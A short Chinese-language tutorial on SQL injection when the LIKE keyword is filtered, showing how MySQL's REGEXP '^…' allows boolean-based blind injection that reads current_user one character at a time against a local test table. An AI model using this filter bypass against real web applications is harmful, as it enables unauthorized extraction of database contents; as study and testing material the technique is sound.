0x00 概要

不允许 “like” 出现时的注入方法

使用 REGEXP 可以实现与 like 相同的功能

使用方法: 表达式 REGEXP ‘^判断条件’ 相当于 表达式 like ‘判断条件%’

0x01 测试数据

  1. mysql> select user();
  2. +----------------+
  3. | user()         |
  4. +----------------+
  5. | root@localhost |
  6. +----------------+
  7. 1 row in set (0.00 sec)
  1. mysql> select current_user;
  2. +----------------+
  3. | current_user   |
  4. +----------------+
  5. | root@localhost |
  6. +----------------+
  7. 1 row in set (0.00 sec)
  1. mysql> select * from users where id=48;
  2. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  3. | id | unionid                      | nickname | sex | province | city | avatar | created_at          | updated_at          |
  4. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  5. | 48 | oBjot1NCTkmEiaL-o-TAZD4npHUg | "ZOO"    |   1 | 广东     | 珠海 | NULL   | 2018-10-06 17:15:39 | 2018-10-06 17:15:39 |
  6. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  7. 1 row in set (0.00 sec)

0x02 测试

  1. // 正确的情况
  2. // 会返回原来的数据页面保持不变
  4. mysql> select * from users where id=48 and '1' REGEXP '^1';
  5. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  6. | id | unionid                      | nickname | sex | province | city | avatar | created_at          | updated_at          |
  7. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  8. | 48 | oBjot1NCTkmEiaL-o-TAZD4npHUg | "ZOO"    |   1 | 广东     | 珠海 | NULL   | 2018-10-06 17:15:39 | 2018-10-06 17:15:39 |
  9. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  10. 1 row in set
  1. // 查询current_user数据正确的情况
  2. // 会返回原来的数据页面保持不变,说明 current_user 第一位为 “r”
  4. mysql> select * from users where id=48 and current_user REGEXP '^r';
  5. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  6. | id | unionid                      | nickname | sex | province | city | avatar | created_at          | updated_at          |
  7. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  8. | 48 | oBjot1NCTkmEiaL-o-TAZD4npHUg | "ZOO"    |   1 | 广东     | 珠海 | NULL   | 2018-10-06 17:15:39 | 2018-10-06 17:15:39 |
  9. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  10. 1 row in set
  1. // 查询current_user数据正确的情况
  2. // 会返回原来的数据页面保持不变,说明 current_user 第二位为 “o”
  4. mysql> select * from users where id=48 and current_user REGEXP '^ro';
  5. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  6. | id | unionid                      | nickname | sex | province | city | avatar | created_at          | updated_at          |
  7. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  8. | 48 | oBjot1NCTkmEiaL-o-TAZD4npHUg | "ZOO"    |   1 | 广东     | 珠海 | NULL   | 2018-10-06 17:15:39 | 2018-10-06 17:15:39 |
  9. +----+------------------------------+----------+-----+----------+------+--------+---------------------+---------------------+
  10. 1 row in set
  1. // 错误的情况
  2. // 页面会爆错,如果关闭了错误提示,页面的数据会为空
  4. mysql> select * from users where id=48 and current_user REGEXP '^aa';
  5. Empty set